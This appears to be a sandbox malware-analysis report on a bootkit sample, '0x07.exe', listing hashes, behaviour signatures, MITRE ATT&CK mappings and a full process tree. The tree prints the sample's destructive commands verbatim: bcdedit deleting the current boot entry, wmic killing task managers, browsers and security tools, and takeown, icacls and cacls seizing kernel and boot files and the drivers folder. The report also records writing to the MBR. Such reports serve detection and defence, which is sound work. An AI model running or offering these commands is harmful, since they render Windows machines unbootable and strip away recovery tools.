52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb

General

Target

0x07.exe
Size

247KB
MD5

733eb0ab951ae42a8d8cca413201e428
SHA1

640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1
SHA256

52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb
SHA512

c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f
SSDEEP

3072:xaWEHnqlm+0FEaJSq6+ouCpk2mpcWJ0r+QNTBfZnazJ9k3kxMC+89+aPyXiwQ9M1:cWCMm8aMldk1cWQRNTBhz3Yz/qc9M1

Score

8^/10

bootkit discovery exploit persistence

Malware Config

Signatures

Possible privilege escalation attempt 25 IoCs

exploit

Processes:

takeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exe

pid	process
1684	takeown.exe
912	icacls.exe
1492	takeown.exe
2300	takeown.exe
288	icacls.exe
1888	icacls.exe
2972	takeown.exe
2076	takeown.exe
1556	takeown.exe
1584	takeown.exe
1488	takeown.exe
2840	icacls.exe
2012	icacls.exe
2684	icacls.exe
2116	icacls.exe
1896	icacls.exe
964	takeown.exe
2372	takeown.exe
1836	takeown.exe
3020	icacls.exe
1004	icacls.exe
1236	takeown.exe
3012	takeown.exe
2948	icacls.exe
2320	icacls.exe

Executes dropped EXE 2 IoCs

Processes:

winconfig.exeDetectKey.exe

pid process

2512 winconfig.exe
2608 DetectKey.exe
Loads dropped DLL 1 IoCs

Processes:

0x07.exe

pid process

1968 0x07.exe

pid	process
2512	winconfig.exe
2608	DetectKey.exe

pid	process
1968	0x07.exe

Modifies file permissions 1 TTPs 25 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exe

pid	process
1896	icacls.exe
1684	takeown.exe
1236	takeown.exe
2076	takeown.exe
1004	icacls.exe
1492	takeown.exe
2300	takeown.exe
912	icacls.exe
2320	icacls.exe
1584	takeown.exe
2948	icacls.exe
2012	icacls.exe
3020	icacls.exe
1888	icacls.exe
3012	takeown.exe
1556	takeown.exe
288	icacls.exe
2684	icacls.exe
1488	takeown.exe
2840	icacls.exe
2372	takeown.exe
1836	takeown.exe
2972	takeown.exe
964	takeown.exe
2116	icacls.exe

Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

1940 bcdedit.exe
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

0x07.exe

description ioc process

File opened for modification \??\PhysicalDrive0 0x07.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

DetectKey.exe

pid process

2608 DetectKey.exe

pid	process
1940	bcdedit.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	0x07.exe

pid	process
2608	DetectKey.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2620	WMIC.exe
Token: SeSecurityPrivilege	2620	WMIC.exe
Token: SeTakeOwnershipPrivilege	2620	WMIC.exe
Token: SeLoadDriverPrivilege	2620	WMIC.exe
Token: SeSystemProfilePrivilege	2620	WMIC.exe
Token: SeSystemtimePrivilege	2620	WMIC.exe
Token: SeProfSingleProcessPrivilege	2620	WMIC.exe
Token: SeIncBasePriorityPrivilege	2620	WMIC.exe
Token: SeCreatePagefilePrivilege	2620	WMIC.exe
Token: SeBackupPrivilege	2620	WMIC.exe
Token: SeRestorePrivilege	2620	WMIC.exe
Token: SeShutdownPrivilege	2620	WMIC.exe
Token: SeDebugPrivilege	2620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2620	WMIC.exe
Token: SeRemoteShutdownPrivilege	2620	WMIC.exe
Token: SeUndockPrivilege	2620	WMIC.exe
Token: SeManageVolumePrivilege	2620	WMIC.exe
Token: 33	2620	WMIC.exe
Token: 34	2620	WMIC.exe
Token: 35	2620	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2620	WMIC.exe
Token: SeSecurityPrivilege	2620	WMIC.exe
Token: SeTakeOwnershipPrivilege	2620	WMIC.exe
Token: SeLoadDriverPrivilege	2620	WMIC.exe
Token: SeSystemProfilePrivilege	2620	WMIC.exe
Token: SeSystemtimePrivilege	2620	WMIC.exe
Token: SeProfSingleProcessPrivilege	2620	WMIC.exe
Token: SeIncBasePriorityPrivilege	2620	WMIC.exe
Token: SeCreatePagefilePrivilege	2620	WMIC.exe
Token: SeBackupPrivilege	2620	WMIC.exe
Token: SeRestorePrivilege	2620	WMIC.exe
Token: SeShutdownPrivilege	2620	WMIC.exe
Token: SeDebugPrivilege	2620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2620	WMIC.exe
Token: SeRemoteShutdownPrivilege	2620	WMIC.exe
Token: SeUndockPrivilege	2620	WMIC.exe
Token: SeManageVolumePrivilege	2620	WMIC.exe
Token: 33	2620	WMIC.exe
Token: 34	2620	WMIC.exe
Token: 35	2620	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2456	WMIC.exe
Token: SeSecurityPrivilege	2456	WMIC.exe
Token: SeTakeOwnershipPrivilege	2456	WMIC.exe
Token: SeLoadDriverPrivilege	2456	WMIC.exe
Token: SeSystemProfilePrivilege	2456	WMIC.exe
Token: SeSystemtimePrivilege	2456	WMIC.exe
Token: SeProfSingleProcessPrivilege	2456	WMIC.exe
Token: SeIncBasePriorityPrivilege	2456	WMIC.exe
Token: SeCreatePagefilePrivilege	2456	WMIC.exe
Token: SeBackupPrivilege	2456	WMIC.exe
Token: SeRestorePrivilege	2456	WMIC.exe
Token: SeShutdownPrivilege	2456	WMIC.exe
Token: SeDebugPrivilege	2456	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2456	WMIC.exe
Token: SeRemoteShutdownPrivilege	2456	WMIC.exe
Token: SeUndockPrivilege	2456	WMIC.exe
Token: SeManageVolumePrivilege	2456	WMIC.exe
Token: 33	2456	WMIC.exe
Token: 34	2456	WMIC.exe
Token: 35	2456	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2456	WMIC.exe
Token: SeSecurityPrivilege	2456	WMIC.exe
Token: SeTakeOwnershipPrivilege	2456	WMIC.exe
Token: SeLoadDriverPrivilege	2456	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0x07.exewinconfig.execmd.exe

description	pid	process	target process
PID 1968 wrote to memory of 2512	1968	0x07.exe	winconfig.exe
PID 1968 wrote to memory of 2512	1968	0x07.exe	winconfig.exe
PID 1968 wrote to memory of 2512	1968	0x07.exe	winconfig.exe
PID 1968 wrote to memory of 2512	1968	0x07.exe	winconfig.exe
PID 2512 wrote to memory of 2672	2512	winconfig.exe	cmd.exe
PID 2512 wrote to memory of 2672	2512	winconfig.exe	cmd.exe
PID 2512 wrote to memory of 2672	2512	winconfig.exe	cmd.exe
PID 2512 wrote to memory of 2672	2512	winconfig.exe	cmd.exe
PID 2672 wrote to memory of 2608	2672	cmd.exe	DetectKey.exe
PID 2672 wrote to memory of 2608	2672	cmd.exe	DetectKey.exe
PID 2672 wrote to memory of 2608	2672	cmd.exe	DetectKey.exe
PID 2672 wrote to memory of 2608	2672	cmd.exe	DetectKey.exe
PID 2672 wrote to memory of 1940	2672	cmd.exe	bcdedit.exe
PID 2672 wrote to memory of 1940	2672	cmd.exe	bcdedit.exe
PID 2672 wrote to memory of 1940	2672	cmd.exe	bcdedit.exe
PID 2672 wrote to memory of 2620	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2620	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2620	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2456	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2456	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2456	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2428	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2428	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2428	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2460	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2460	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2460	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2228	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2228	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2228	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 1588	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 1588	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 1588	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2596	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2596	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2596	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2760	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2760	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2760	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2856	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2856	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2856	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2900	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2900	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 2900	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 284	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 284	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 284	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 1576	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 1576	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 1576	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 1624	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 1624	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 1624	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 868	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 868	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 868	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 1272	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 1272	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 1272	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 536	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 536	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 536	2672	cmd.exe	WMIC.exe
PID 2672 wrote to memory of 1196	2672	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\0x07.exe
"C:\Users\Admin\AppData\Local\Temp\0x07.exe"
1⤵
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
PID:1968

C:\Windows\Temp\winconfig.exe
"C:\Windows\Temp\winconfig.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2512

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5E94.tmp\5E95.tmp\5E96.bat C:\Windows\Temp\winconfig.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2672

C:\Users\Admin\AppData\Roaming\DetectKey.exe
"C:\Users\Admin\AppData\Roaming\DetectKey.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2608

C:\Windows\system32\bcdedit.exe
bcdedit /delete {current}
4⤵
- Modifies boot configuration data using bcdedit
PID:1940

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2620

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='perfmon.exe' delete /nointeractive
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2456

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='mmc.exe' delete /nointeractive
4⤵
PID:2428

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='PartAssist.exe' delete /nointeractive
4⤵
PID:2460

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='control.exe' delete /nointeractive
4⤵
PID:2228

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='ProcessHacker.exe' delete /nointeractive
4⤵
PID:1588

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='Security Task Manager.exe' delete /nointeractive
4⤵
PID:2596

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='Security Task Manager Protable.exe' delete /nointeractive
4⤵
PID:2760

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='CCleaner.exe' delete /nointeractive
4⤵
PID:2856

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='procexp.exe' delete /nointeractive
4⤵
PID:2900

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='procexp64.exe' delete /nointeractive
4⤵
PID:284

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='procexp64a.exe' delete /nointeractive
4⤵
PID:1576

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
4⤵
PID:1624

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='regedit.exe' delete /nointeractive
4⤵
PID:868

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='iexplore.exe' delete /nointeractive
4⤵
PID:1272

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='chrome.exe' delete /nointeractive
4⤵
PID:536

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='firefox.exe' delete /nointeractive
4⤵
PID:1196

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='opera.exe' delete /nointeractive
4⤵
PID:704

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='edge.exe' delete /nointeractive
4⤵
PID:1916

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='msedge.exe' delete /nointeractive
4⤵
PID:496

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='brave.exe' delete /nointeractive
4⤵
PID:2052

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='wmplayer.exe' delete /nointeractive
4⤵
PID:1632

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='notepad.exe' delete /nointeractive
4⤵
PID:2256

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='notepad++.exe' delete /nointeractive
4⤵
PID:1428

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
4⤵
PID:2392

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='perfmon.exe' delete /nointeractive
4⤵
PID:2916

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
4⤵
PID:1472

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='ProcessHacker.exe' delete /nointeractive
4⤵
PID:2268

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\taskmgr.exe"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3012

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\hal.dll"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2972

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\winload.exe"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2372

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\ntoskrnl.exe"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1836

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\perfmon.exe"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1488

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\resmon.exe"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1492

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\logonui.exe
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1684

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\taskkill.exe"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:964

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\tasklist.exe"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1556

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\tskill.exe"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1584

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\logonui.exe"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1236

C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\Process Hacker 2"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2076

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\drivers"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2300

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
4⤵
PID:820

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='perfmon.exe' delete /nointeractive
4⤵
PID:1224

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
4⤵
PID:1476

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='ProcessHacker.exe' delete /nointeractive
4⤵
PID:1884

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2948

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\hal.dll" /grant "everyone":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2840

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\winload.exe" /grant "everyone":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2116

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2012

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3020

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1004

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:912

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2320

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:288

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1896

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1888

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2684

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
4⤵
PID:1540

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='perfmon.exe' delete /nointeractive
4⤵
PID:2980

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
4⤵
PID:2120

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='ProcessHacker.exe' delete /nointeractive
4⤵
PID:2556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2600

C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
4⤵
PID:2616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2988

C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\hal.dll" /grant "everyone":F
4⤵
PID:2552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2568

C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
4⤵
PID:2524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2424

C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
4⤵
PID:2412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2520

C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
4⤵
PID:2992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2484

C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
4⤵
PID:2480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2024

C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
4⤵
PID:2876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2956

C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
4⤵
PID:2460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1216

C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
4⤵
PID:1596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2228

C:\Windows\system32\cacls.exe
cacls "C:\Program Files\Process Hacker 2" /grant "everyone":F
4⤵
PID:2720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2584

C:\Windows\system32\cacls.exe
cacls "C:\Windows\System32\drivers" /grant "everyone":F
4⤵
PID:2396

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Pre-OS Boot

1

T1542

Bootkit

1

T1542.003

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Pre-OS Boot

1

T1542

Bootkit

1

T1542.003

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5E94.tmp\5E95.tmp\5E96.bat
Filesize
5KB

MD5
a645734f3bf4a2682cbaf546789ec0c4

SHA1
fafcc11909412bf51f217e12dfaa93a15181a3e2

SHA256
3b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0

SHA512
efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d

Download Submit
C:\Users\Admin\AppData\Roaming\DetectKey.exe
Filesize
87KB

MD5
aba9a3cf4e1db4602c25405987b809a6

SHA1
6cd545ea023ce9cdfe76607c6801cc11ff7d9e80

SHA256
490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6

SHA512
e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675

Download Submit
\Windows\Temp\winconfig.exe
Filesize
139KB

MD5
11d457ee914f72a436fa4a8a8f8446dd

SHA1
d0308ca82ed9716b667e8e77e9ae013b9af44116

SHA256
c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef

SHA512
4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads